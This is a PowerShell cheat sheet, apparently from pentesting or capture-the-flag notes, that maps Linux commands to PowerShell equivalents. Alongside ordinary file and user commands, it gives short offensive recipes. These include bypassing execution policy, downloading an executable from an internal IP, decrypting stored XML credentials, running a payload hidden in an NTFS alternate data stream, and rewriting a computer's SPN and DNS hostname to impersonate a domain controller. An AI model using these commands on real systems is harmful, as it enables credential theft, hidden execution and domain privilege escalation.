PowerShell

Last modified: 2023-03-05

Windows

Powershell is a task automation and configuration management program from Microsoft. Powershell uses the Unicode UTF-16LE encoding by default.

Start PowerShell

On Linux

pwsh

# Execute PS commands without entering shell.
pwsh -Command <cmdlet>

On Windows

powershell

# Bypass ExecutionPolicy
powershell -ep bypass
# check for the result
PS> Get-ExecutionPolicy

Commands

OS Information

$PSVersionInfo

Change Directory

'cd' in Linux.

Set-Location -Path c:\Users\Administrator\Desktop

List Files

'ls' in Linux.

Get-ChildItem -File -Hidden
Get-ChildItem -File -Hidden -ErrorAction SilentlyContinue

Get-ChildItem -Directory -Hidden
Get-ChildItem -Directory -Hidden -Recurse -Filter '*secret*' -ErrorAction SilentlyContinue

Get-ChildItem -Path .\Desktop
Get-ChildItem -Recurse

View the Content of Files

'cat' in Linux.

Get-Content -Path example.txt
# 'cat | wc -l' in Linux
Get-Content -Path example.txt | Measure-Object -Word
# 
(Get-Content -Path example.txt)[318]

Find Files

'find' in Linux.

Get-ChildItem -Path c:\\ -Filter "*.txt" -Recurse 2>$null

Set Content to a File

'echo hello > example.txt' in Linux.

Set-Content -Path .\example.txt -Value hello

Download Web Content

'wget' in Linux.

Invoke-WebRequest -Uri http://10.0.0.1:8000/example.exe -OutFile .\example.exe

Copy Files

'cp' in Linux.

copy c:\Tools\example.exe \Users\michael\Documents\

Cryptography

# md5sum in Linux
Get-FileHash -Algorithm MD5 example.exe
CertUtil -hashfile example.exe MD5

# sha256sum in Linux
Get-FileHash -Algorithm SHA256 example.exe
CertUtil -hashfile example.exe SHA256

# sha512sum in Linux
Get-FileHash -Algorithm SHA512 example.exe
CertUtil -hashfile example.exe SHA512

XML Credential

We can decrypt a password stored in an xml file.

# Decrypt a password in xml.
$Credential = Import-Clixml -Path .\example.xml
$Credential.GetNetworkCredential().password

'strings' in Linux.

.\Strings.exe -accepteula example.exe

Add New User

'useradd' in Linux.

New-LocalUser -Name "username" -Description "My first account" -NoPassword

# with password
$Password = Read-Host -AsSecureString
New-LocalUser -Name "username" -Password $Password -FullName "New User" -Description "My first account"

Show the Manual of Command

'man' or '--help' in Linux.

Get-Help Get-ChildItem
Get-Help Invoke-WebRequest

Create New File

'touch' in Linux.

New-Item example.txt
$null > example.txt

Create New Folder

'mkdir' in Linux

mkdir example_folder

Remove Files

'rm' in Linux

rm exxample.txt
rm -r example_folder

Reboot Computer

'reboot' in Linux

Restart-Computer

NTFS (New Technology File System) ADS (Alternate Data Steams)

NTFS ADS allows the malware creator to hide data in an endpoint.

Get-Item -Path file.exe -Stream *

To launch the hidden executable hiding with ADS, run the following command.

wmic process call create $(Resolve-Path example.exe:streamname)

Active Directory

# List all domain objects in AD
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com

# List all domain controllers in AD
Get-DomainController

# List all computers in the newtork
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

# Get the machine which participates the Active Directory
Get-ADComputer <PC-NAME> -properties dnshostname,serviceprincipalname

# Remove the current SPN attribute
Set-ADComputer <PC-NAME> -ServicePrincipalName @{}

# Set new DNS hostname to that of the DC
Set-ADComputer <PC-NAME> -DnsHostName VULNDC.vuln.local